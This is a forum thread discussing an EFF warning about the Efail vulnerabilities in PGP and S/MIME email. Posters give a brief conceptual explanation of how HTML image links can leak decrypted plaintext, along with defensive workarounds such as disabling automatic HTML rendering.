ATTENTION: You are viewing a page formatted for mobile devices; to view the full web page, click HERE.

Main Area and Open Discussion > General Software Discussion

eff says immediately disable or uninstall tools that auto decrypt PGP email


Security warning: says that you need to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

This looks pretty serious.  Although they are not saying what the flaw is yet, the key seems to be if you have a mail program that AUTOMATICALLY decrypts pgp encrypted emails, somehow that can be hijacked.

A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.

The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.

Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.

--- End quote ---


Information is now available at

From a cursory glance, it seems the problem is in how some programs (email clients) handle image links embedded in html messages.

Basically, an attacker who has gotten hold of a message encrypted for you can send you an email with that encrypted message as part of a link to an image, and the email client will decrypt the encrypted part and then attempt to retrieve the image, effectively sending the plaintext to the attacker as part of the url.

That's pretty clever.. But it seems to be not so big a risk to most people.
So first step, an attacker needs to get hold of an email encrypted TO you, that they want to be able to read.  Without that there is no harm they can do.

A simple workaround for those that need this functionality in their mail client: disable the (automatic) opening of mail messages with HTML content.

For those able to read the source of mail messages: copy-paste the content of the encrypted message to another piece of software that is not your mail client, but which is (rudimentary) able to process the encrypted content anyway.

Automatic opening/viewing of mail messages should be prohibited in practically every imaginable use case scenario anyway. Efail is just the latest example of this.


[0] Message Index

Go to full version